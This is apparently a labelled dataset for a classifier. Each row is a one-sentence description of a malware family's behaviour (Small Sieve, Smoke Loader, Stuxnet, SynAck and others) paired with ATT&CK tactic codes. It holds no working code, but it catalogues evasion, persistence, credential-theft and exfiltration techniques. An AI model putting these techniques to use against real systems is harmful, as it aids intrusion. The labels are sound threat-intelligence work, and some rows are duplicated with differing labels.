Sliver can use AES-GCM-256 to encrypt a session key for C2 message exchange.,['TA0011:Command and Control']
Sliver has the ability to gather network configuration information.,['TA0007:Discovery']
Sliver can collect network connection information.,['TA0007:Discovery']
Sliver has the ability to support C2 communications over HTTP/S.,['TA0011:Command and Control']
Small Sieve can use SSL/TLS for its HTTPS Telegram Bot API-based C2 channel.,['TA0011:Command and Control']
Small Sieve has the ability to use the Telegram Bot API from Telegram Messenger to send and receive messages.,['TA0011:Command and Control']
Small Sieve can only execute correctly if the word `Platypus` is passed to it on the command line.,['TA0005:Defense Evasion']
Small Sieve has the ability to download files.,['TA0011:Command and Control']
"Small Sieve can use variations of Microsoft and Outlook spellings, such as ""Microsift"", in its file names to avoid detection.",['TA0005:Defense Evasion']
Small Sieve can use a custom hex byte swapping encoding scheme to obfuscate tasking traffic.,['TA0011:Command and Control']
Small Sieve has the ability to use a custom hex byte swapping encoding scheme combined with an obfuscated Base64 function to protect program strings and Telegram credentials.,['TA0005:Defense Evasion']
Small Sieve can use Python scripts to execute commands.,['TA0002:Execution']
Small Sieve has the ability to add itself to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run\OutlookMicrosift` for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Small Sieve can obtain the IP address of a victim host.,['TA0007:Discovery']
Small Sieve can obtain the id of a logged in user.,['TA0007:Discovery']
Small Sieve can contact actor-controlled C2 servers by using the Telegram API over HTTPS.,['TA0011:Command and Control']
Small Sieve can use `cmd.exe` to execute commands on a victim's system.,['TA0002:Execution']
Smoke Loader searches for files named logins.json to parse for credentials.,['TA0006:Credential Access']
Smoke Loader searches for credentials stored from web browsers.,['TA0006:Credential Access']
Smoke Loader deobfuscates its code.,['TA0005:Defense Evasion']
Smoke Loader uses a simple one-byte XOR method to obfuscate values in the malware.,['TA0005:Defense Evasion']
Smoke Loader recursively searches through directories for files.,['TA0007:Discovery']
Smoke Loader downloads a new version of itself once it has installed. It also downloads additional plugins.,['TA0011:Command and Control']
Smoke Loader searches through Outlook files and directories .,['TA0009:Collection']
Smoke Loader spawns a new copy of c:\windows\syswow64\explorer.exe and then replaces the executable code in memory with malware.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Smoke Loader injects into the Internet Explorer process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Smoke Loader adds a Registry Run key for persistence and adds a script in the Startup folder to deploy the payload.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Smoke Loader launches a scheduled task.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Smoke Loader scans processes to perform anti-VM checks.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Smoke Loader adds a Visual Basic script in the Startup folder to deploy the payload.,['TA0002:Execution']
Smoke Loader uses HTTP for C2.,['TA0011:Command and Control']
Snip3 can obfuscate strings using junk Chinese characters.,['TA0005:Defense Evasion']
Snip3 can decode its second-stage PowerShell script prior to execution.,['TA0005:Defense Evasion']
Snip3 has been delivered to targets via downloads from malicious domains.,['TA0001:Initial Access']
Snip3 can execute PowerShell scripts in a hidden window.,['TA0005:Defense Evasion']
Snip3 can download additional payloads to compromised systems.,['TA0011:Command and Control']
Snip3 can gain execution through the download of visual basic files.,['TA0002:Execution']
Snip3 has been executed through luring victims into clicking malicious links.,['TA0002:Execution']
Snip3 can download and execute additional payloads and modules over separate communication channels.,['TA0011:Command and Control']
Snip3 has the ability to obfuscate strings using XOR encryption.,['TA0005:Defense Evasion']
Snip3 can use a PowerShell script for second-stage execution.,['TA0002:Execution']
Snip3 can use RunPE to execute malicious payloads within a hollowed Windows process.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Snip3 can create a VBS file in startup to persist after system restarts.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Snip3 has been delivered to victims through malicious e-mail attachments.,['TA0001:Initial Access']
Snip3 has been delivered to victims through e-mail links to malicious files.,['TA0001:Initial Access']
"Snip3 has the ability to detect Windows Sandbox, VMWare, or VirtualBox by querying `Win32_ComputerSystem` to extract the `Manufacturer` string.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
Snip3 has the ability to query `Win32_ComputerSystem` for system information.,['TA0007:Discovery']
Snip3 can execute `WScript.Sleep` to delay execution of its second stage.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Snip3 can use visual basic scripts for first-stage execution.,['TA0002:Execution']
Snip3 can download additional payloads from web services including Pastebin and top4top.,['TA0011:Command and Control']
Snip3 can query the WMI class `Win32_ComputerSystem` to gather information.,['TA0002:Execution']
SocGholish can profile compromised systems to identify domain trust relationships.,['TA0007:Discovery']
SocGholish has been distributed through compromised websites with malicious content often masquerading as browser updates.,['TA0001:Initial Access']
The SocGholish JavaScript payload has been delivered within a compressed ZIP archive. SocGholish has also single or double Base-64 encoded references to its second-stage server URLs.,['TA0005:Defense Evasion']
SocGholish can exfiltrate data directly to its C2 domain via HTTP.,['TA0010:Exfiltration']
SocGholish can download additional malware to infected hosts.,['TA0011:Command and Control']
The SocGholish payload is executed as JavaScript.,['TA0002:Execution']
SocGholish can send output from `whoami` to a local temp file using the naming convention `rad<5-hex-chars>.tmp`.,['TA0009:Collection']
SocGholish has lured victims into interacting with malicious links on compromised websites for execution.,['TA0002:Execution']
SocGholish has been named `AutoUpdater.js` to mimic legitimate update files.,['TA0005:Defense Evasion']
SocGholish can list processes on targeted hosts.,['TA0007:Discovery']
SocGholish can identify the victim's browser in order to serve the correct fake update page.,['TA0007:Discovery']
SocGholish has been spread via emails containing malicious links.,['TA0001:Initial Access']
SocGholish has the ability to enumerate system information including the victim computer name.,['TA0007:Discovery']
"SocGholish can use IP-based geolocation to limit infections to victims in North America, Europe, and a small number of Asian-Pacific nations.",['TA0007:Discovery']
"SocGholish has the ability to enumerate the domain name of a victim, as well as if the host is a member of an Active Directory domain.",['TA0007:Discovery']
SocGholish can use `whoami` to obtain the username from a compromised host.,['TA0007:Discovery']
SocGholish has used Amazon Web Services to host second-stage servers.,['TA0011:Command and Control']
SocGholish has used WMI calls for script execution and system profiling.,['TA0002:Execution']
Socksbot creates a suspended svchost process and injects its DLL into it.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Socksbot can write and execute PowerShell scripts.,['TA0002:Execution']
Socksbot can list all running processes.,['TA0007:Discovery']
Socksbot can start SOCKS proxy threads.,['TA0011:Command and Control']
Socksbot can take screenshots.,['TA0009:Collection']
SodaMaster can use a hardcoded RSA key to encrypt some of its C2 traffic.,['TA0011:Command and Control']
SodaMaster has the ability to download additional payloads from C2 to the targeted system.,['TA0011:Command and Control']
SodaMaster can use RegOpenKeyW to access the Registry.,['TA0002:Execution']
"SodaMaster can use ""stackstrings"" for obfuscation.",['TA0005:Defense Evasion']
SodaMaster can search a list of running processes.,['TA0007:Discovery']
SodaMaster has the ability to query the Registry to detect a key specific to VMware.,['TA0007:Discovery']
SodaMaster can use RC4 to encrypt C2 communications.,['TA0011:Command and Control']
SodaMaster can check for the presence of the Registry key HKEY_CLASSES_ROOT\\Applications\\VMwareHostOpen.exe before proceeding to its main functionality.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
SodaMaster can enumerate the host name and OS version on a target system.,['TA0007:Discovery']
SodaMaster can identify the username on a compromised host.,['TA0007:Discovery']
"SodaMaster has the ability to put itself to ""sleep"" for a specified time.","['TA0005:Defense Evasion', 'TA0007:Discovery']"
SombRAT has encrypted collected data with AES-256 using a hardcoded key.,['TA0009:Collection']
SombRAT can SSL encrypt C2 traffic.,['TA0011:Command and Control']
SombRAT can communicate over DNS with the C2 server.,['TA0011:Command and Control']
SombRAT has collected data and files from a compromised host.,['TA0009:Collection']
SombRAT can run upload to decrypt and upload files from storage.,['TA0005:Defense Evasion']
SombRAT can use a custom DGA to generate a subdomain for C2.,['TA0011:Command and Control']
"SombRAT can execute loadfromfile, loadfromstorage, and loadfrommem to inject a DLL from disk, storage, or memory respectively.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
SombRAT has uploaded collected data and files from a compromised host to its C2 server.,['TA0010:Exfiltration']
SombRAT has the ability to run cancel or closeanddeletestorage to remove all files from storage and delete the storage temp file on a compromised host.,['TA0005:Defense Evasion']
SombRAT can execute enum to enumerate files in storage on a compromised system.,['TA0007:Discovery']
SombRAT has the ability to download and execute additional payloads.,['TA0011:Command and Control']
SombRAT can store harvested data in a custom database under the %TEMP% directory.,['TA0009:Collection']
SombRAT can use a legitimate process name to hide itself.,['TA0005:Defense Evasion']
SombRAT has the ability to respawn itself using ShellExecuteW and CreateProcessW.,['TA0002:Execution']
SombRAT has the ability to use TCP sockets to send data and ICMP to ping the C2 server.,['TA0011:Command and Control']
"SombRAT can encrypt strings with XOR-based routines and use a custom AES storage format for plugins, configuration, C2 domains, and harvested data.",['TA0005:Defense Evasion']
SombRAT has the ability to modify its process memory to hide process command-line arguments.,['TA0005:Defense Evasion']
SombRAT can use the getprocesslist command to enumerate processes on a compromised host.,['TA0007:Discovery']
SombRAT has the ability to use an embedded SOCKS proxy in C2 communications.,['TA0011:Command and Control']
SombRAT has encrypted its C2 communications with AES.,['TA0011:Command and Control']
SombRAT can execute getinfo to enumerate the computer name and OS version of a compromised system.,['TA0007:Discovery']
SombRAT can execute getinfo to identify the username on a compromised host.,['TA0007:Discovery']
SombRAT can enumerate services on a victim machine.,['TA0007:Discovery']
SombRAT can execute getinfo to discover the current time on a compromised host.,['TA0007:Discovery']
SoreFang can decode and decrypt exfiltrated data sent to C2.,['TA0005:Defense Evasion']
SoreFang can enumerate domain accounts via net.exe user /domain.,['TA0007:Discovery']
SoreFang can enumerate domain groups by executing net.exe group /domain.,['TA0007:Discovery']
SoreFang can gain access by exploiting a Sangfor SSL VPN vulnerability that allows for the placement and delivery of malicious update binaries.,['TA0001:Initial Access']
SoreFang has the ability to list directories.,['TA0007:Discovery']
SoreFang can download additional payloads from C2.,['TA0011:Command and Control']
SoreFang can collect usernames from the local system via net.exe user.,['TA0007:Discovery']
SoreFang has the ability to encode and RC6 encrypt data sent to C2.,['TA0005:Defense Evasion']
SoreFang can enumerate processes on a victim machine through use of Tasklist.,['TA0007:Discovery']
SoreFang can gain persistence through use of scheduled tasks.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"SoreFang can collect the hostname, operating system configuration, product ID, and disk space on victim machines by executing Systeminfo.",['TA0007:Discovery']
"SoreFang can collect the TCP/IP, DNS, DHCP, and network adapter configuration on a compromised host via ipconfig.exe /all.",['TA0007:Discovery']
SoreFang can use HTTP in C2 communications.,['TA0011:Command and Control']
Spark has used a custom XOR algorithm to decrypt the payload.,['TA0005:Defense Evasion']
Spark has exfiltrated data over the C2 channel.,['TA0010:Exfiltration']
Spark has been packed with Enigma Protector to obfuscate its contents.,['TA0005:Defense Evasion']
Spark has encoded communications with the C2 server with base64.,['TA0011:Command and Control']
"Spark can collect the hostname, keyboard layout, and language from the system.",['TA0007:Discovery']
Spark has checked the results of the GetKeyboardLayoutList and the language name returned by GetLocaleInfoA to make sure they contain the word “Arabic” before executing.,['TA0007:Discovery']
Spark has run the whoami command and has a built-in command to identify the user logged in.,['TA0007:Discovery']
Spark has used a splash screen to check whether an user actively clicks on the screen before running malicious code.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Spark has used HTTP POST requests to communicate with its C2 server to receive commands.,['TA0011:Command and Control']
Spark can use cmd.exe to run commands.,['TA0002:Execution']
SpeakUp uses Perl scripts.,['TA0002:Execution']
SpeakUp uses cron tasks to ensure persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
SpeakUp encodes its second-stage payload with Base64.,['TA0005:Defense Evasion']
"SpeakUp attempts to exploit the following vulnerabilities in order to execute its malicious script: CVE-2012-0874, CVE-2010-1871, CVE-2017-10271, CVE-2018-2894, CVE-2016-3088, JBoss AS 3/4/5/6, and the Hadoop YARN ResourceManager.",['TA0002:Execution']
SpeakUp deletes files to remove evidence on the machine.,['TA0005:Defense Evasion']
SpeakUp downloads and executes additional files from a remote server.,['TA0011:Command and Control']
SpeakUp checks for availability of specific ports on servers.,['TA0007:Discovery']
SpeakUp can perform brute forcing using a pre-defined list of usernames and passwords in an attempt to log in to administrative panels.,['TA0006:Credential Access']
SpeakUp uses Python scripts.,['TA0002:Execution']
SpeakUp encodes C&C communication using Base64.,['TA0011:Command and Control']
SpeakUp uses the cat /proc/cpuinfo | grep -c “cpu family” 2>&1 command to gather system information.,['TA0007:Discovery']
SpeakUp uses the ifconfig -a command.,['TA0007:Discovery']
SpeakUp uses the arp -a command.,['TA0007:Discovery']
SpeakUp uses the whoami command.,['TA0007:Discovery']
SpeakUp uses POST and GET requests over HTTP to communicate with its main C&C server.,['TA0011:Command and Control']
Spica can archive collected documents for exfiltration.,['TA0009:Collection']
Upon execution Spica can decode an embedded .pdf and write it to the desktop as a decoy document.,['TA0005:Defense Evasion']
Spica can list filesystem contents on targeted systems.,['TA0007:Discovery']
Spica can upload and download files to and from compromised hosts.,['TA0011:Command and Control']
Spica has created a scheduled task named `CalendarChecker` for persistence on compromised hosts.,['TA0005:Defense Evasion']
Spica can use JSON over WebSockets for C2 communications.,['TA0011:Command and Control']
Spica can use an obfuscated PowerShell command to create a scheduled task for persistence.,['TA0002:Execution']
Spica has created a scheduled task named `CalendarChecker` to establish persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Spica has the ability to steal cookies from Chrome, Firefox, Opera, and Edge browsers.",['TA0006:Credential Access']
SpicyOmelette has been signed with valid digital certificates.,['TA0005:Defense Evasion']
SpicyOmelette has collected data and other information from a compromised host.,['TA0009:Collection']
SpicyOmelette can download malicious files from threat actor controlled AWS URL's.,['TA0011:Command and Control']
SpicyOmelette has the ability to execute arbitrary JavaScript code on a compromised host.,['TA0002:Execution']
SpicyOmelette has been executed through malicious links within spearphishing emails.,['TA0002:Execution']
"SpicyOmelette can identify payment systems, payment gateways, and ATM systems in compromised environments.",['TA0007:Discovery']
SpicyOmelette can check for the presence of 29 different antivirus tools.,['TA0007:Discovery']
SpicyOmelette can enumerate running software on a targeted system.,['TA0007:Discovery']
SpicyOmelette has been distributed via emails containing a malicious link that appears to be a PDF document.,['TA0001:Initial Access']
SpicyOmelette can identify the system name of a compromised host.,['TA0007:Discovery']
SpicyOmelette can identify the IP of a compromised system.,['TA0007:Discovery']
Squirrelwaffle has encrypted collected data using a XOR-based algorithm.,['TA0009:Collection']
Squirrelwaffle has decrypted files and payloads using a XOR-based algorithm.,['TA0005:Defense Evasion']
Squirrelwaffle has been obfuscated with a XOR-based algorithm.,['TA0005:Defense Evasion']
Squirrelwaffle has exfiltrated victim data using HTTP POST requests to its C2 servers.,['TA0010:Exfiltration']
Squirrelwaffle has downloaded and executed additional encoded payloads.,['TA0011:Command and Control']
Squirrelwaffle has relied on users enabling malicious macros within Microsoft Excel and Word attachments.,['TA0002:Execution']
Squirrelwaffle has relied on victims to click on a malicious link send via phishing campaigns.,['TA0002:Execution']
Squirrelwaffle has used PowerShell to execute its payload.,['TA0002:Execution']
Squirrelwaffle has been executed using `regsvr32.exe`.,['TA0005:Defense Evasion']
Squirrelwaffle has been executed using `rundll32.exe`.,['TA0005:Defense Evasion']
Squirrelwaffle has been packed with a custom packer to hide payloads.,['TA0005:Defense Evasion']
Squirrelwaffle has been distributed via malicious Microsoft Office documents within spam emails.,['TA0001:Initial Access']
Squirrelwaffle has been distributed through phishing emails containing a malicious URL.,['TA0001:Initial Access']
Squirrelwaffle has encoded its communications to C2 servers using Base64.,['TA0011:Command and Control']
Squirrelwaffle has gathered victim computer information and configurations.,['TA0007:Discovery']
Squirrelwaffle has collected the victim’s external IP address.,['TA0007:Discovery']
Squirrelwaffle can collect the user name from a compromised host.,['TA0007:Discovery']
Squirrelwaffle has contained a hardcoded list of IP addresses to block that belong to sandboxes and analysis platforms.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
Squirrelwaffle has used malicious VBA macros in Microsoft Word documents and Excel spreadsheets that execute an `AutoOpen` subroutine.,['TA0002:Execution']
Squirrelwaffle has used HTTP POST requests for C2 communications.,['TA0011:Command and Control']
Squirrelwaffle has used `cmd.exe` for execution.,['TA0002:Execution']
SslMM contains a feature to manipulate process privileges and tokens.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
SslMM identifies and kills anti-malware processes.,['TA0005:Defense Evasion']
SslMM has a hard-coded primary and backup C2 string.,['TA0011:Command and Control']
SslMM creates a new thread implementing a keylogging facility using Windows Keyboard Accelerators.,"['TA0009:Collection', 'TA0006:Credential Access']"
"To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.",['TA0005:Defense Evasion']
"To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"To establish persistence, SslMM identifies the Start Menu Startup directory and drops a link to its own executable disguised as an “Office Start,” “Yahoo Talk,” “MSN Gaming Z0ne,” or “MSN Talk” shortcut.","['TA0003:Persistence', 'TA0004:Privilege Escalation']"
"SslMM sends information to its hard-coded C2, including OS version, service pack information, processor speed, system name, and OS install date.",['TA0007:Discovery']
SslMM sends the logged-on username to its hard-coded C2.,['TA0007:Discovery']
Starloader decrypts and executes shellcode from a file called Stars.jps.,['TA0005:Defense Evasion']
Starloader has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel.,['TA0005:Defense Evasion']
StoneDrill has a disk wiper module that targets files other than those in the Windows directory.,['TA0040:Impact']
StoneDrill can wipe the accessible physical or logical drives of the infected machine.,['TA0040:Impact']
StoneDrill can wipe the master boot record of an infected computer.,['TA0040:Impact']
StoneDrill has obfuscated its module with an alphabet-based table or XOR encryption.,['TA0005:Defense Evasion']
StoneDrill has been observed deleting the temporary files once they fulfill their task.,['TA0005:Defense Evasion']
StoneDrill has downloaded and dropped temporary files containing scripts; it additionally has a function to upload files from the victims machine.,['TA0011:Command and Control']
StoneDrill has relied on injecting its payload directly into the process memory of the victim's preferred browser.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
StoneDrill has looked in the registry to find the default browser path.,['TA0007:Discovery']
StoneDrill can take screenshots.,['TA0009:Collection']
StoneDrill can check for antivirus and antimalware programs.,['TA0007:Discovery']
"StoneDrill has the capability to discover the system OS, Windows version, architecture and environment.",['TA0007:Discovery']
StoneDrill can obtain the current date and time of the victim machine.,['TA0007:Discovery']
StoneDrill has used several anti-emulation techniques to prevent automated analysis by emulators or sandboxes.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
StoneDrill has several VBS scripts used throughout the malware's lifecycle.,['TA0002:Execution']
StoneDrill has used the WMI command-line utility to run tasks.,['TA0002:Execution']
StreamEx has the ability to enumerate drive types.,['TA0007:Discovery']
StreamEx has the ability to modify the Registry.,['TA0005:Defense Evasion']
StreamEx obfuscates some commands by using statically programmed fragments of strings when starting a DLL. It also uses a one-byte xor against 0x91 to encode configuration data.,['TA0005:Defense Evasion']
StreamEx has the ability to enumerate processes.,['TA0007:Discovery']
StreamEx uses rundll32 to call an exported function.,['TA0005:Defense Evasion']
StreamEx has the ability to scan for security tools such as firewalls and antivirus tools.,['TA0007:Discovery']
StreamEx has the ability to enumerate system information.,['TA0007:Discovery']
StreamEx has the ability to remotely execute commands.,['TA0002:Execution']
StreamEx establishes persistence by installing a new service pointing to its DLL and setting the service to auto-start.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
StrifeWater can collect data from a compromised host.,['TA0009:Collection']
StrifeWater can send data and files from a compromised host to its C2 server.,['TA0010:Exfiltration']
StrifeWater can self delete to cover its tracks.,['TA0005:Defense Evasion']
StrifeWater can enumerate files on a compromised host.,['TA0007:Discovery']
StrifeWater can download updates and auxiliary modules.,['TA0011:Command and Control']
StrifeWater has been named `calc.exe` to appear as a legitimate calculator program.,['TA0005:Defense Evasion']
StrifeWater can use a variety of APIs for execution.,['TA0002:Execution']
StrifeWater has create a scheduled task named `Mozilla\Firefox Default Browser Agent 409046Z0FF4A39CB` for persistence.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
StrifeWater has the ability to take screen captures.,['TA0009:Collection']
StrifeWater can encrypt C2 traffic using XOR with a hard coded key.,['TA0011:Command and Control']
"StrifeWater can collect the OS version, architecture, and machine name to create a unique token for the infected host.",['TA0007:Discovery']
StrifeWater can collect the user name from the victim's machine.,['TA0007:Discovery']
StrifeWater can collect the time zone from the victim's machine.,['TA0007:Discovery']
StrifeWater can modify its sleep time responses from the default of 20-22 seconds.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
StrifeWater can execute shell commands using `cmd.exe`.,['TA0002:Execution']
StrongPity can compress and encrypt archived files into multiple .sft files with a repeated xor encryption scheme.,['TA0009:Collection']
StrongPity has encrypted C2 traffic using SSL/TLS.,['TA0011:Command and Control']
StrongPity has a file searcher component that can automatically collect and archive files based on a predefined list of file extensions.,['TA0009:Collection']
StrongPity can automatically exfiltrate collected documents to the C2 server.,['TA0010:Exfiltration']
StrongPity has been signed with self-signed certificates.,['TA0005:Defense Evasion']
StrongPity can add directories used by the malware to the Windows Defender exclusions list to prevent detection.,['TA0005:Defense Evasion']
StrongPity has used encrypted strings in its dropper component.,['TA0005:Defense Evasion']
StrongPity can exfiltrate collected documents through C2 channels.,['TA0010:Exfiltration']
StrongPity can delete previously exfiltrated files from the compromised host.,['TA0005:Defense Evasion']
StrongPity can parse the hard drive on a compromised host to identify specific file extensions.,['TA0007:Discovery']
StrongPity has the ability to hide the console window for its document search module from the user.,['TA0005:Defense Evasion']
StrongPity can download files to specified targets.,['TA0011:Command and Control']
"StrongPity has been executed via compromised installation files for legitimate software including compression applications, security software, browsers, file recovery applications, and other tools and utilities.",['TA0002:Execution']
StrongPity has named services to appear legitimate.,['TA0005:Defense Evasion']
StrongPity has been bundled with legitimate software installation files for disguise.,['TA0005:Defense Evasion']
StrongPity can use multiple layers of proxy servers to hide terminal nodes in its infrastructure.,['TA0011:Command and Control']
StrongPity has used HTTPS over port 1402 in C2 communication.,['TA0011:Command and Control']
StrongPity can use PowerShell to add files to the Windows Defender exclusions list.,['TA0002:Execution']
StrongPity can determine if a user is logged in by checking to see if explorer.exe is running.,['TA0007:Discovery']
StrongPity can use the HKCU\Software\Microsoft\Windows\CurrentVersion\Run Registry key for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
StrongPity can identify if ESET or BitDefender antivirus are installed before dropping its payload.,['TA0007:Discovery']
StrongPity can install a service to execute itself as a service.,['TA0002:Execution']
StrongPity can identify the hard disk volume serial number on a compromised host.,['TA0007:Discovery']
StrongPity can identify the IP address of a compromised host.,['TA0007:Discovery']
StrongPity can use HTTP and HTTPS in C2 communications.,['TA0011:Command and Control']
StrongPity has created new services and modified existing services for persistence.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Stuxnet encrypts exfiltrated data via C2 with static 31-byte long XOR keys.,['TA0009:Collection']
Stuxnet used a digitally signed driver with a compromised Realtek certificate.,['TA0005:Defense Evasion']
Stuxnet infected WinCC machines via a hardcoded database server password.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Stuxnet decrypts resources that are loaded into memory and executed.,['TA0005:Defense Evasion']
Stuxnet enumerates user accounts of the domain.,['TA0007:Discovery']
Stuxnet attempts to access network resources with a domain account’s credentials.,"['TA0005:Defense Evasion', 'TA0001:Initial Access', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
"Stuxnet injects an entire DLL into an existing, newly created, or preselected trusted process.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Stuxnet uses encrypted configuration blocks and writes encrypted files to disk.,['TA0005:Defense Evasion']
"Stuxnet checks for specific operating systems on 32-bit machines, Registry keys, and dates for vulnerabilities, and will exit execution if the values are not met.",['TA0005:Defense Evasion']
Stuxnet sends compromised victim information via HTTP.,['TA0010:Exfiltration']
Stuxnet used MS10-073 and an undisclosed Task Scheduler vulnerability to escalate privileges on local Windows machines.,['TA0004:Privilege Escalation']
Stuxnet propagates using the MS10-061 Print Spooler and MS08-067 Windows Server Service vulnerabilities.,['TA0008:Lateral Movement']
Stuxnet has the ability to generate new C2 domains.,['TA0011:Command and Control']
Stuxnet uses an RPC server that contains a routine for file deletion and also removes itself from the system through a DLL export by deleting specific files.,['TA0005:Defense Evasion']
Stuxnet uses a driver to scan for specific filesystem driver objects.,['TA0007:Discovery']
Stuxnet reduces the integrity level of objects to allow write actions.,['TA0005:Defense Evasion']
Stuxnet can delete OLE Automation and SQL stored procedures used to store malicious payloads.,['TA0005:Defense Evasion']
Stuxnet installs an RPC server for P2P communications.,['TA0011:Command and Control']
Stuxnet uses an RPC server that contains a file dropping routine and support for payload version updates for P2P communications within a victim network.,['TA0008:Lateral Movement']
Stuxnet enumerates user accounts of the local host.,['TA0007:Discovery']
Stuxnet can create registry keys to load driver files.,['TA0005:Defense Evasion']
Stuxnet uses the SetSecurityDescriptorDacl API to reduce object integrity levels.,['TA0002:Execution']
Stuxnet enumerates the directories of a network resource.,['TA0007:Discovery']
Stuxnet enumerates removable drives for infection.,['TA0007:Discovery']
Stuxnet searches the Registry for indicators of security programs.,['TA0007:Discovery']
Stuxnet can propagate via peer-to-peer communication and updates using RPC.,['TA0008:Lateral Movement']
Stuxnet can propagate via removable media using an autorun.inf file or the CVE-2010-2568 LNK vulnerability.,"['TA0001:Initial Access', 'TA0008:Lateral Movement']"
Stuxnet uses a Windows rootkit to mask its binaries and other relevant files.,['TA0005:Defense Evasion']
Stuxnet propagates to available network shares.,['TA0008:Lateral Movement']
Stuxnet used xp_cmdshell to store and execute SQL code.,['TA0003:Persistence']
Stuxnet schedules a network job to execute two minutes after host infection.,"['TA0002:Execution', 'TA0003:Persistence', 'TA0004:Privilege Escalation']"
Stuxnet enumerates the currently running processes related to a variety of security products.,['TA0007:Discovery']
Stuxnet calls LoadLibrary then executes exports from a DLL.,['TA0002:Execution']
Stuxnet transforms encrypted binary data into an ASCII string in order to use it as a URL parameter value.,['TA0011:Command and Control']
Stuxnet encodes the payload of system information sent to the command and control servers using a one byte 0xFF XOR key. Stuxnet also uses a 31-byte long static byte string to XOR data sent to command and control servers. The servers use a different static key to encrypt replies to the implant.,['TA0011:Command and Control']
"Stuxnet collects system information including computer and domain names, OS version, and S7P paths.",['TA0007:Discovery']
Stuxnet collects the IP address of a compromised system.,['TA0007:Discovery']
Stuxnet collects the time and date of a system when it is infected.,['TA0007:Discovery']
Stuxnet infects remote servers via network shares and by infecting WinCC database views with malicious code.,['TA0008:Lateral Movement']
Stuxnet extracts and writes driver files that match the times of other legitimate files.,['TA0005:Defense Evasion']
Stuxnet attempts to impersonate an anonymous token to enumerate bindings in the service control manager.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Stuxnet uses HTTP to communicate with a command and control server.,['TA0011:Command and Control']
Stuxnet used WMI with an explorer.exe token to execute on a remote share.,['TA0002:Execution']
Stuxnet uses a driver registered as a boot start service as the main load-point.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Sykipot uses SSL for encrypting C2 communications.,['TA0011:Command and Control']
"Sykipot may use net group ""domain admins"" /domain to display accounts in the ""domain admins"" permissions group and net localgroup ""administrators"" to list local system administrator group membership.",['TA0007:Discovery']
"Sykipot injects itself into running instances of outlook.exe, iexplore.exe, or firefox.exe.","['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
Sykipot contains keylogging functionality to steal passwords.,"['TA0009:Collection', 'TA0006:Credential Access']"
Sykipot is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens.,['TA0006:Credential Access']
Sykipot may gather a list of running processes by running tasklist /v.,['TA0007:Discovery']
Sykipot has been known to establish persistence by adding programs to the Run Registry key.,"['TA0003:Persistence', 'TA0004:Privilege Escalation']"
Sykipot may use net view /domain to display hostnames of available systems on a network.,['TA0007:Discovery']
Sykipot may use ipconfig /all to gather system network configuration details.,['TA0007:Discovery']
Sykipot may use netstat -ano to display active network connections.,['TA0007:Discovery']
Sykipot may use net start to display running services.,['TA0007:Discovery']
SynAck clears event logs.,['TA0005:Defense Evasion']
SynAck encrypts the victims machine followed by asking the victim to pay a ransom.,['TA0040:Impact']
SynAck checks its directory location in an attempt to avoid launching in a sandbox.,['TA0007:Discovery']
SynAck can manipulate Registry keys.,['TA0005:Defense Evasion']
SynAck parses the export tables of system DLLs to locate and call various Windows API functions.,['TA0002:Execution']
SynAck payloads are obfuscated prior to compilation to inhibit analysis and/or reverse engineering.,['TA0005:Defense Evasion']
SynAck enumerates all running processes.,['TA0007:Discovery']
SynAck abuses NTFS transactions to launch and conceal malicious processes.,"['TA0005:Defense Evasion', 'TA0004:Privilege Escalation']"
SynAck enumerates Registry keys associated with event logs.,['TA0007:Discovery']
SynAck checks its directory location in an attempt to avoid launching in a sandbox.,"['TA0005:Defense Evasion', 'TA0007:Discovery']"
"SynAck gathers computer names, OS version info, and also checks installed keyboard layouts to estimate if it has been launched from a certain list of countries.",['TA0007:Discovery']
"SynAck lists all the keyboard layouts installed on the victim’s system using GetKeyboardLayoutList API and checks against a hardcoded language code list. If a match if found, SynAck sleeps for 300 seconds and then exits without encrypting files.",['TA0007:Discovery']
SynAck gathers user names from infected hosts.,['TA0007:Discovery']
SynAck enumerates all running services.,['TA0007:Discovery']
